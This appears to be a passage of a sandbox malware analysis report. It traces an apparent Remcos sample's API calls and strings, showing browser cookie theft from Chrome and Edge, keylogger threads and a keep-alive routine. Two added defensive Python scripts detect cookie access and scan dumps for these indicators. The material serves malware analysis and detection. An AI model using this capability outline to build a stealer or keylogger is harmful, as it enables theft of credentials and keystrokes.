                                                                                                                                                    • Opcode Fuzzy Hash: 744accdd9eb699fad8fddecee443e069ebbe41d163cba56c132e5b5ed36f6f74
                                                                                                                                                    • Instruction Fuzzy Hash: 0B01F93EB0575167C33196755CD8D4B251FEBC2271720059EFC19A2680EF34EC01C1E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA24
                                                                                                                                                      • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA54
                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 02DEAA5F
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DEAAA3,?,?,00000000), ref: 02DEAA7D
                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 02DEAA88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                    • Opcode ID: cac1bc99c277f8d82401060a97a6aa11c12cd0f9e571650ee23f7f1030f97f50
                                                                                                                                                    • Instruction ID: edfb848079cea0857446917b9a9fe8657c89be7db6ab85e8fde97d8913baec8d
                                                                                                                                                    • Opcode Fuzzy Hash: cac1bc99c277f8d82401060a97a6aa11c12cd0f9e571650ee23f7f1030f97f50
                                                                                                                                                    • Instruction Fuzzy Hash: BC01F2713047896BFF02BA74DD12B5F72AEDB55720F910560F503AA7C0EA64EE008AB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 1569C1F5
                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 1569C208
                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 1569C228
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1569C233
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 1569C23B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                    • Opcode ID: 1d7b9fa15bcfd941e5de534dc27a53fe9bb9c6087f9de8d92d8f29dd710bf434
                                                                                                                                                    • Instruction ID: 3ed1b871ca7c1ab1ef22e34b1fd4aeca2c22df67b27c14e02235483b24de7493
                                                                                                                                                    • Opcode Fuzzy Hash: 1d7b9fa15bcfd941e5de534dc27a53fe9bb9c6087f9de8d92d8f29dd710bf434
                                                                                                                                                    • Instruction Fuzzy Hash: E60126B16402296FE3149698CC88F6BF37DEB446A6F00011AFE88C31C5EF605C41C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156D09D4
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156D09E6
                                                                                                                                                    • _free.LIBCMT ref: 156D09F8
                                                                                                                                                    • _free.LIBCMT ref: 156D0A0A
                                                                                                                                                    • _free.LIBCMT ref: 156D0A1C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 7d1a97679c67a28937d5f10923a5e7b75cf71bbb5a1b0e59806c05a63ffc3442
                                                                                                                                                    • Instruction ID: 50146b28e6e40e552039792c44ede316b97467a86c464e4fe6d27131157d5b94
                                                                                                                                                    • Opcode Fuzzy Hash: 7d1a97679c67a28937d5f10923a5e7b75cf71bbb5a1b0e59806c05a63ffc3442
                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0FF3591E214A7C710DA6DE4D1C5AB3DDFA057A17909D4AF0AAE7902DE34FC80C6E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156C4066
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156C4078
                                                                                                                                                    • _free.LIBCMT ref: 156C408B
                                                                                                                                                    • _free.LIBCMT ref: 156C409C
                                                                                                                                                    • _free.LIBCMT ref: 156C40AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: fdf55e571f2c4ed481e06bf50ad61c06fe58148e0f7bf2169f7de3899b60419c
                                                                                                                                                    • Instruction ID: cb9728d1e5a47b72b3b16ca946bb9774761f69cd4c280f39dbb03ab29ede3871
                                                                                                                                                    • Opcode Fuzzy Hash: fdf55e571f2c4ed481e06bf50ad61c06fe58148e0f7bf2169f7de3899b60419c
                                                                                                                                                    • Instruction Fuzzy Hash: F2F0F975D2A1388FC7219F189CF04053669F709662354458FE42462670CF316E81CFEA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DE352C: GetKeyboardType.USER32(00000000), ref: 02DE3531
                                                                                                                                                      • Part of subcall function 02DE352C: GetKeyboardType.USER32(00000001), ref: 02DE353D
                                                                                                                                                    • GetCommandLineA.KERNEL32(2C02E1C5), ref: 02E0A06C
                                                                                                                                                    • GetACP.KERNEL32(2C02E1C5), ref: 02E0A080
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02E0A08A
                                                                                                                                                      • Part of subcall function 02DE355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE357E
                                                                                                                                                      • Part of subcall function 02DE355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35B1
                                                                                                                                                      • Part of subcall function 02DE355C: RegCloseKey.ADVAPI32(?,02DE35D4,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                                                    • String ID: p&y
                                                                                                                                                    • API String ID: 3316616684-1102576638
                                                                                                                                                    • Opcode ID: 31c50437d01c9b46613f37b24b16677ea172afa0b49c982aba2562f2957e131f
                                                                                                                                                    • Instruction ID: 3387fdcdc8b3a4376610a9d1cc6afdebee1be5e3106fab99de890f791707af9c
                                                                                                                                                    • Opcode Fuzzy Hash: 31c50437d01c9b46613f37b24b16677ea172afa0b49c982aba2562f2957e131f
                                                                                                                                                    • Instruction Fuzzy Hash: 4B415B5448E3C18FC713AF3658641543FB1AF07308B0A49C7DAC1CF2A7D22829AADB76
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _strpbrk.LIBCMT ref: 156CE738
                                                                                                                                                    • _free.LIBCMT ref: 156CE855
                                                                                                                                                      • Part of subcall function 156BBD19: IsProcessorFeaturePresent.KERNEL32(00000017,156BBCEB,?,?,?,?,?,00000000,?,?,156BBD0B,00000000,00000000,00000000,00000000,00000000), ref: 156BBD1B
                                                                                                                                                      • Part of subcall function 156BBD19: GetCurrentProcess.KERNEL32(C0000417), ref: 156BBD3D
                                                                                                                                                      • Part of subcall function 156BBD19: TerminateProcess.KERNEL32(00000000), ref: 156BBD44
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                    • String ID: *?$.
                                                                                                                                                    • API String ID: 2812119850-3972193922
                                                                                                                                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                    • Instruction ID: d778b6af930ea152a0cb98583ae660778caabaab794c437890677fb09e227436
                                                                                                                                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                    • Instruction Fuzzy Hash: FC51A475E0120AEFDB15CFA8CC80AADBBB5FF48314F2541A9D454E7740D675AE01CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02DEAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DEAAEB
                                                                                                                                                      • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                    • Opcode ID: 6fe77194e02951cbb77aee648680436e84df2d3661706c952f0df5552b04e0c0
                                                                                                                                                    • Instruction ID: 59ac9abbbbdea8e0509efd92e6ae3bc518394b2e3b42dd9b56af538a35e136f7
                                                                                                                                                    • Opcode Fuzzy Hash: 6fe77194e02951cbb77aee648680436e84df2d3661706c952f0df5552b04e0c0
                                                                                                                                                    • Instruction Fuzzy Hash: 9641D0387045068BDF11FBB989902BEB7EBEB85300FA445A6E483C7354D634ED02DAB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 1568C4F6
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 1568C61D
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1568C688
                                                                                                                                                    Strings
                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 1568C603
                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 1568C635
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                    • Opcode ID: fd2d47e5990b966227c561261d29bccc697ea565141f5d48cf470f7caad291d6
                                                                                                                                                    • Instruction ID: c76b8010380922982eeddeba650ba61d48f1945a9704a301ed8968e00e4d2cf9
                                                                                                                                                    • Opcode Fuzzy Hash: fd2d47e5990b966227c561261d29bccc697ea565141f5d48cf470f7caad291d6
                                                                                                                                                    • Instruction Fuzzy Hash: 06213075B022199ADB04EBB1DC55CEEBB7CFE50211F400129E502A7194EF30BA8AC6D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1568C559
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 1568C6EC
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1568C757
                                                                                                                                                    Strings
                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 1568C6D2
                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 1568C704
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                    • Opcode ID: fedb33110d3a7e2fd523cc59fa66f62d3d1d3113cc87f6262daf7d513c2b0d39
                                                                                                                                                    • Instruction ID: afc870e4e1779d4fe3e943a63173aff9c3354616d7a0c23e938c270e616e543b
                                                                                                                                                    • Opcode Fuzzy Hash: fedb33110d3a7e2fd523cc59fa66f62d3d1d3113cc87f6262daf7d513c2b0d39
                                                                                                                                                    • Instruction Fuzzy Hash: 4C213075F02219DADF04EBA1DC55CEEBB7CFE50611F400129E502A7194EF30BA4AC6D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
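The two function blocks above show the unpacked payload (mapped at 0x15680000) probing, via PathFileExistsW, the Chrome and Edge cookie databases under "User Data\Default\Network\Cookies" and "User Data\Profile ?\Network\Cookies", with the "?" filled in at run time. The script below is an added example, not code from the report or from the sample: it rebuilds that candidate path list from the patterns the trace exposes so a defender can see exactly which files the sample would touch, and then flags any non-browser process that opens one of them in file-access telemetry. The event record shape, the browser process names and the profile-number bound are assumptions; the events themselves are constructed.

```python
"""
Added example (not part of the Joe Sandbox report or the sample itself).

Rebuilds the cookie-database paths the trace shows the payload probing
(Chrome and Edge, Default profile plus numbered profiles) and flags
non-browser processes that open them. Event shape and browser image
names are assumptions; the sample events are constructed.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Browser roots seen in the trace, relative to %LOCALAPPDATA%.
BROWSER_ROOTS = {
    "chrome": r"Google\Chrome",
    "edge": r"Microsoft\Edge",
}

# Process images that legitimately own these databases (assumption).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}


def candidate_cookie_paths(local_appdata: str, max_profiles: int = 9) -> list[str]:
    """Expand the two path patterns from the trace for every browser root.

    'Profile ?' is expanded to 'Profile 1' .. 'Profile <max_profiles>';
    the bound the sample actually uses is not visible in the report.
    """
    paths = []
    for rel in BROWSER_ROOTS.values():
        user_data = ntpath.join(local_appdata, rel, "User Data")
        paths.append(ntpath.join(user_data, "Default", "Network", "Cookies"))
        for n in range(1, max_profiles + 1):
            paths.append(ntpath.join(user_data, f"Profile {n}", "Network", "Cookies"))
    return paths


@dataclass(frozen=True)
class FileEvent:
    """Minimal file-access record (shape assumed, e.g. from Sysmon or EDR)."""
    pid: int
    image: str   # basename of the process image
    path: str    # full path that was opened or probed


def flag_cookie_access(events: list[FileEvent], local_appdata: str) -> list[FileEvent]:
    """Return events where a non-browser process touches a cookie DB path."""
    targets = {p.lower() for p in candidate_cookie_paths(local_appdata)}
    return [
        e for e in events
        if e.path.lower() in targets and e.image.lower() not in BROWSER_IMAGES
    ]


# Constructed telemetry for a stand-alone run.
LOCAL_APPDATA = r"C:\Users\victim\AppData\Local"
SAMPLE_EVENTS = [
    FileEvent(4120, "chrome.exe",
              LOCAL_APPDATA + r"\Google\Chrome\User Data\Default\Network\Cookies"),
    FileEvent(5300, "fu56fbrtn8.exe",
              LOCAL_APPDATA + r"\Google\Chrome\User Data\Default\Network\Cookies"),
    FileEvent(5300, "fu56fbrtn8.exe",
              LOCAL_APPDATA + r"\Microsoft\Edge\User Data\Profile 2\Network\Cookies"),
    FileEvent(5300, "fu56fbrtn8.exe",
              LOCAL_APPDATA + r"\Microsoft\Edge\User Data\Profile 2\Login Data"),
]

if __name__ == "__main__":
    for hit in flag_cookie_access(SAMPLE_EVENTS, LOCAL_APPDATA):
        print(f"pid={hit.pid} image={hit.image} opened {hit.path}")
```

Only the Cookies database is matched because that is the only file the trace shows; the "Login Data" event in the constructed input is deliberately left unflagged to make that scope explicit.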

                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A27D,156F50F0,00000000,00000000), ref: 1568A1FE
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A267,156F50F0,00000000,00000000), ref: 1568A20E
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A289,156F50F0,00000000,00000000), ref: 1568A21A
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                    • Opcode ID: db9f95140e49fa52683de3ff20699c636b0739423838479b22c383cd8a786a85
                                                                                                                                                    • Instruction ID: 602c596a73c02f25c6c7691e51785257ba999a2ab7ae9dc57d1b7fbb633cb25f
                                                                                                                                                    • Opcode Fuzzy Hash: db9f95140e49fa52683de3ff20699c636b0739423838479b22c383cd8a786a85
                                                                                                                                                    • Instruction Fuzzy Hash: 1B11C6B92053087ED230BB359C95CBF766DDA811A8B40062DF84702151EE617D54CBF6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A267,?,00000000,00000000), ref: 1568AF6E
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A289,?,00000000,00000000), ref: 1568AF7A
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A295,?,00000000,00000000), ref: 1568AF86
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                    • Opcode ID: c5f4a5381e97610417ff8192bfc7d75bb76774c3126088b614db7af45283a054
                                                                                                                                                    • Instruction ID: f79fa2c150c9d0fbb1cfb47cb22fd0c139cde8f0469fc58f4d73a73b0acfde26
                                                                                                                                                    • Opcode Fuzzy Hash: c5f4a5381e97610417ff8192bfc7d75bb76774c3126088b614db7af45283a054
                                                                                                                                                    • Instruction Fuzzy Hash: A301C0E8B063593EE63076358C85DBF7A6DCA820A4B840628F98217645D9613C49C7F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
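The function blocks in this part of the report each carry a String ID ("Offline Keylogger Started", "Online Keylogger Started", "KeepAlive | Enabled | Timeout: ", and the two cookie path patterns) that identifies a Remcos feature. The scanner below is an added example, not code from the report or the sample: it searches a process memory dump (such as the .sdmp files the Memory Dump Source lines refer to) for those strings and maps each hit to the feature it indicates. The report does not state whether the strings are stored as ANSI or UTF-16LE (the wsprintfW and PathFileExistsW calls suggest wide strings), so both encodings are searched. The feature labels are assumptions, and the dump bytes are constructed.

```python
"""
Added example, not from the report or the sample.

Locate the capability strings listed in the report's String ID fields
inside a memory dump and tag each hit with the Remcos feature it
indicates. Both ANSI and UTF-16LE are searched because the report does
not show the storage encoding. Feature labels are assumptions; the
sample dump is constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# Strings taken from the String ID fields, keyed to an assumed feature label.
INDICATORS = {
    "Offline Keylogger Started": "keylogger-offline",
    "Online Keylogger Started": "keylogger-online",
    "KeepAlive | Enabled | Timeout: ": "c2-keepalive",
    r"User Data\Default\Network\Cookies": "browser-cookie-theft",
    r"User Data\Profile ?\Network\Cookies": "browser-cookie-theft",
}

ENCODINGS = ("ascii", "utf-16-le")


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str
    text: str
    feature: str


def scan_dump(buf: bytes) -> list[Hit]:
    """Return every occurrence of an indicator string in buf, in any encoding."""
    hits = []
    for text, feature in INDICATORS.items():
        for enc in ENCODINGS:
            needle = text.encode(enc)
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                hits.append(Hit(pos, enc, text, feature))
                start = pos + 1
    return sorted(hits, key=lambda h: h.offset)


def features_present(hits: list[Hit]) -> set[str]:
    """Collapse hits to the set of feature labels observed."""
    return {h.feature for h in hits}


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump: indicator strings with filler."""
    filler = b"\x00" * 16
    return (
        filler
        + "Offline Keylogger Started".encode("utf-16-le") + filler
        + b"KeepAlive | Enabled | Timeout: " + filler             # ANSI copy
        + r"User Data\Profile ?\Network\Cookies".encode("utf-16-le") + filler
    )


if __name__ == "__main__":
    # For a real dump: scan_dump(open("dump.sdmp", "rb").read())
    for h in scan_dump(build_sample_dump()):
        print(f"0x{h.offset:08x} {h.encoding:9} {h.feature:22} {h.text}")
```

The offsets returned are relative to the start of the dump file; to compare them with the xrefs in the report, add the Offset value from the corresponding Memory Dump Source line.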

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 15684F81
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 15684FCD
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15685150,?,00000000,00000000), ref: 15684FE0
                                                                                                                                                    Strings
                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 15684F94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                    • API String ID: 2532271599-1507639952
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,15685159), ref: 15685173
• CloseHandle.KERNEL32(?), ref: 156851CA
• SetEvent.KERNEL32(?), ref: 156851D9
Strings
Memory Dump Source
